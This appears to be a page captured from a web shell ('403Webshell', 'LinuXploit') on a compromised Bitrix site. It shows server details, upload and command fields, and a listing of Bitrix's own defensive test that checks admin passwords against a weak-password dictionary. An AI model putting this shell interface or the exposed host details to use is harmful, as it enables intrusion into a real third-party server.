403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/security/classes/general/tests/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/security/classes/general/tests/user.php
<?
/**
 * Bitrix Framework
 * @package bitrix
 * @subpackage security
 * @copyright 2001-2013 Bitrix
 */

/**
 * Class CSecurityUserTest
 * @since 14.0.3
 */
class CSecurityUserTest
	extends CSecurityBaseTest
{
	protected $internalName = 'UsersTest';
	/** @var CSecurityTemporaryStorage */
	protected $sessionData = null;
	protected $maximumExecutionTime = 0.0;
	protected $savedMaxExecutionTime = 0.0;

	public function __construct()
	{
		IncludeModuleLangFile(__FILE__);
		$this->savedMaxExecutionTime = ini_get("max_execution_time");
		if ($this->savedMaxExecutionTime <= 0)
		{
			$phpMaxExecutionTime = 30;
		}
		else
		{
			$phpMaxExecutionTime = $this->savedMaxExecutionTime - 2;
		}
		$this->maximumExecutionTime = time() + $phpMaxExecutionTime;
		set_time_limit(0);
	}

	public function __destruct()
	{
		set_time_limit($this->savedMaxExecutionTime);
	}

	/**
	 * @param array $params
	 * @return array
	 */
	public function check(array $params = [])
	{
		if (count($this->tests))
		{
			return parent::check($params);
		}

		$this->initializeParams($params);
		$testID = $this->getParam('TEST_ID', $this->internalName);
		$sessionData = new CSecurityTemporaryStorage($testID);

		if (!$sessionData->isExists('current_user'))
		{
			$user = static::getNextUser(0);
			$passwordId = 0;
		}
		else
		{
			$user = static::getNextUser($sessionData->getInt('current_user'));
			$passwordId = $sessionData->getInt('current_password');
		}

		if ($user && (int)$user['ID'] > 0)
		{
			$userChecked = true;
			$passwordDictionary = static::getPasswordDictionary();
			$hash = $user['PASSWORD'];
			for ($i = $passwordId, $max = count($passwordDictionary); $i < $max; $i++)
			{
				if ($this->isTimeOut())
				{
					$sessionData->setData('current_password', $i);
					$userChecked = false;
					break;
				}
				if (\Bitrix\Main\Security\Password::equals($hash, $passwordDictionary[$i]))
				{
					$sessionData->pushToArray('weak_users', (int)$user['ID']);
					break;
				}
			}

			if ($userChecked)
			{
				$sessionData->setData('current_user', (int)$user['ID']);
			}
			else
			{
				$sessionData->setData('current_user', (int)$user['ID'] - 1);
			}

			$result = [
				'name' => $this->getName(),
				'timeout' => 1,
				'in_progress' => true,
			];
		}
		else
		{
			$weakUsers = $sessionData->getArray('weak_users');
			$sessionData->flushData();
			$result = [
				'name' => $this->getName(),
				'problem_count' => !empty($weakUsers) ? 1 : 0,
				'errors' => [
					[
						'title' => GetMessage('SECURITY_SITE_CHECKER_ADMIN_WEAK_PASSWORD'),
						'critical' => CSecurityCriticalLevel::HIGHT,
						'detail' => GetMessage('SECURITY_SITE_CHECKER_ADMIN_WEAK_PASSWORD_DETAIL'),
						'recommendation' => $result = GetMessage('SECURITY_SITE_CHECKER_ADMIN_WEAK_PASSWORD_RECOMMENDATIONS'),
						'additional_info' => !empty($weakUsers) ? static::formatRecommendation($weakUsers) : '',
					],
				],
				'status' => empty($weakUsers),
			];
		}

		return $result;
	}

	/**
	 * @param array $weakUsers
	 * @return string
	 */
	protected static function formatRecommendation(array $weakUsers)
	{
		$result = getMessage('SECURITY_SITE_CHECKER_ADMIN_WEAK_PASSWORD_USER_LIST');
		foreach (static::getUsersLogins($weakUsers) as $id => $login)
		{
			$result .= sprintf(
				'<br><a href="/bitrix/admin/user_edit.php?ID=%d" target="_blank">%s<a/>',
				$id, htmlspecialcharsbx($login)
			);
		}

		return $result;
	}

	/**
	 * @param int $id
	 * @return int
	 */
	protected static function getNextUser($id)
	{
		$result = null;
		$users = static::getAdminUserList(1, $id);
		if ($user = $users->fetch())
		{
			$result = $user;
		}

		return $result;
	}

	/**
	 * @param int[] $ids
	 * @return array
	 */
	protected static function getUsersLogins(array $ids)
	{
		if (empty($ids))
		{
			return [];
		}

		$dbUser = CUser::GetList(
			'ID',
			'ASC',
			[
				'ID' => implode('|', $ids),
				'ACTIVE' => 'Y',
			],
			[
				'FIELDS' => 'LOGIN',
			]
		);

		$result = [];
		if ($dbUser)
		{
			while ($user = $dbUser->fetch())
			{
				$result[$user['ID']] = $user['LOGIN'];
			}
		}

		return $result;
	}

	protected static function getPasswordDictionary()
	{
		static $passwords = null;

		if (is_null($passwords))
		{
			$passwords = file($_SERVER['DOCUMENT_ROOT'] . '/bitrix/modules/security/data/passwordlist.txt',
				FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
		}

		return $passwords;
	}

	/**
	 * @param int $limit
	 * @param int $minId
	 * @return CDBResult
	 */
	protected static function getAdminUserList($limit = 0, $minId = 0)
	{
		$dbUser = CUser::GetList(
			'ID',
			'ASC',
			[
				'GROUPS_ID' => 1,
				'>ID' => $minId,
				'ACTIVE' => 'Y',
			],
			[
				'FIELDS' => 'ID',
				'NAV_PARAMS' => [
					'nTopCount' => $limit,
				],
			]
		);

		if ($dbUser)
		{
			return $dbUser;
		}
		else
		{
			return new CDBResult([]);
		}
	}

	/**
	 * @return bool
	 */
	protected function isTimeOut()
	{
		return (time() >= $this->maximumExecutionTime);
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit